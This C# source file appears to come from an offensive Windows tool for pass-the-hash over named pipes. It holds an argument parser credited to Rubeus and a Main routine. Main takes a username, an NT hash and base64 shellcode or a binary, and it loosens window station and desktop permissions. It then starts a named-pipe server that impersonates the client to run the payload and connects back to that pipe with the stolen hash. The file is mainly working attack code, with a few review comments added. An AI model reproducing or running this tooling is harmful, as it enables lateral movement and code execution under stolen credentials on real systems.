        //Argument parsing class from Rubeus (https://github.com/GhostPack/Rubeus/)
        //Author: @Harmj0y

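        /// <summary>
        /// Turns the raw command-line tokens into a key/value dictionary.
        /// A token containing ':' is split at the first ':' and stored under its
        /// lower-cased key with the remainder as the (case-preserved) value; the
        /// known bare switches are mapped to fixed keys with the value "true";
        /// any other token is kept verbatim with an empty value.
        /// </summary>
        /// <param name="args">Raw command-line tokens.</param>
        /// <returns>
        /// ArgumentParserResult.Success with the dictionary, or ArgumentParserResult.Failure
        /// when an exception is thrown while iterating (its message is written to the console).
        /// </returns>
        public static ArgumentParserResult Parse(IEnumerable <string> args)
        {
            var arguments = new Dictionary <string, string>();

            try
            {
                foreach (var argument in args)
                {
                    var idx = argument.IndexOf(':');
                    if (idx > 0)
                    {
                        // Keys are case-insensitive; the value (hash, base64 blob, path) keeps its case.
                        // Invariant lowering: ToLower() is culture-sensitive and under e.g. tr-TR
                        // maps 'I' to a dotless i, so "HASH:" would not match the "hash" key.
                        arguments[argument.Substring(0, idx).ToLowerInvariant()] = argument.Substring(idx + 1);
                        continue;
                    }

                    // Bare switches. "-h"/"-help" and "-forcesmb1"/"-smb1" are aliases;
                    // a string switch compares ordinally, so no culture issue here either.
                    switch (argument.ToLowerInvariant())
                    {
                        case "-debug":
                            arguments["debugging"] = "true";
                            break;
                        case "-h":
                        case "-help":
                            arguments["showhelp"] = "true";
                            break;
                        case "-checkadmin":
                            arguments["admincheck"] = "true";
                            break;
                        case "-forcesmb1":
                        case "-smb1":
                            arguments["forcesmb1"] = "true";
                            break;
                        case "-comspec":
                            arguments["comspec"] = "true";
                            break;
                        default:
                            // Unknown bare token: kept as-is so the caller can still see it.
                            arguments[argument] = string.Empty;
                            break;
                    }
                }

                return ArgumentParserResult.Success(arguments);
            }
            catch (System.Exception ex)
            {
                // Best-effort reporting; the caller only sees ParsedOk == false.
                Console.WriteLine(ex.Message);
                return ArgumentParserResult.Failure();
            }
        }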
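        /// <summary>
        /// Entry point. Parses the command line, starts the named-pipe server thread
        /// (which impersonates the connecting client and is handed the binary / decoded
        /// shellcode), then connects to that pipe with the supplied NT hash.
        /// </summary>
        /// <param name="args">
        /// "key:value" tokens and bare switches as understood by ArgParse.Parse.
        /// Required: username, hash, and either shellcode (base64) or binary.
        /// Optional: pipename, domain (default "."), -forcesmb1 / -smb1.
        /// </param>
        public static void Main(string[] args)
        {
            //User Set
            string username  = "";
            string domain    = ".";
            // NOTE(review): a hard-coded default pipe name is a static artifact of this
            // tool; operators will normally want to override it with pipename:<name>.
            string pipename  = "ShitSecure";
            string hash      = "";
            bool   ForceSMB1 = false;
            string binary    = "";
            string shellcode = "";
            byte[] shellcodebytes = null;   // stays null when only a binary was supplied

            bool usernamegiven  = false;
            bool hashgiven      = false;
            bool shellcodegiven = false;
            bool binarygiven    = false;

            try
            {
                if (args.Length < 1)
                {
                    displayHelp("Usage:");
                    return;
                }
                ArgumentParserResult arguments = ArgParse.Parse(args);

                if (arguments.ParsedOk == false)
                {
                    displayHelp("Error Parsing Arguments");
                    return;
                }

                // The parser maps "-h"/"-help" to the "showhelp" key, so that is the only
                // help key that can ever be present here.
                if (arguments.Arguments.ContainsKey("showhelp"))
                {
                    displayHelp("Usage:");
                    return;
                }
                if (arguments.Arguments.ContainsKey("pipename"))
                {
                    pipename = arguments.Arguments["pipename"];
                }
                if (arguments.Arguments.ContainsKey("shellcode"))
                {
                    shellcode      = arguments.Arguments["shellcode"];
                    shellcodegiven = true;
                }

                if (arguments.Arguments.ContainsKey("binary"))
                {
                    binary      = arguments.Arguments["binary"];
                    binarygiven = true;
                }

                if (arguments.Arguments.ContainsKey("forcesmb1"))
                {
                    ForceSMB1 = true;
                }

                if (arguments.Arguments.ContainsKey("hash"))
                {
                    // NOTE(review): the hash is supplied on the command line and is therefore
                    // exposed to anything on the host that records process command lines.
                    hash      = arguments.Arguments["hash"];
                    hashgiven = true;
                }
                if (arguments.Arguments.ContainsKey("username"))
                {
                    username      = arguments.Arguments["username"];
                    usernamegiven = true;
                }

                if (arguments.Arguments.ContainsKey("domain"))
                {
                    domain = arguments.Arguments["domain"];
                }
                if (!(usernamegiven && hashgiven && (shellcodegiven || binarygiven)))
                {
                    Console.WriteLine(usernamegiven);
                    Console.WriteLine(hashgiven);
                    Console.WriteLine(shellcodegiven);
                    Console.WriteLine(binarygiven);
                    displayHelp("Usage:");
                    return;
                }

                // Decode inside the try so malformed base64 is reported as an argument error
                // (and rejected before the window-station ACL is touched below) instead of
                // escaping as an unhandled FormatException.
                if (shellcodegiven)
                {
                    shellcodebytes = Convert.FromBase64String(shellcode);
                }
            }
            catch
            {
                displayHelp("Error Parsing Arguments");
                return;
            }

            //Change WINSTA/DESKTOP Permissions
            // Presumably so a process run under the impersonated user can attach to the
            // interactive window station/desktop — confirm against GrantAccessToWindowStationAndDesktop.
            GrantAccessToWindowStationAndDesktop(username);

            // Start Pipe Server. Both binary and shellcodebytes are always passed; whichever
            // was not supplied is "" / null respectively.
            Console.WriteLine("Starting Pipe Server Thread!");
            Thread t = new Thread(() => SharpNamedPipePTH.PipeServerImpersonate.ImpersonateClient(pipename, binary, shellcodebytes));
            t.Start();

            // Connect to the Named Pipe via NamedPipePTH
            Console.WriteLine($"Connecting to the Named Pipe via Pass-the-Hash - using username {username}");
            // Fixed grace period for the server thread to start listening. There is no readiness
            // signal from the thread, so on a slow host the connect can still race the listener.
            // TODO(review): replace with an event the pipe server sets once it is listening.
            Thread.Sleep(4000);
            SharpNamedPipePTH.NamedpipePTH.NamedPipePTH(username, domain, hash, pipename, ForceSMB1);
        }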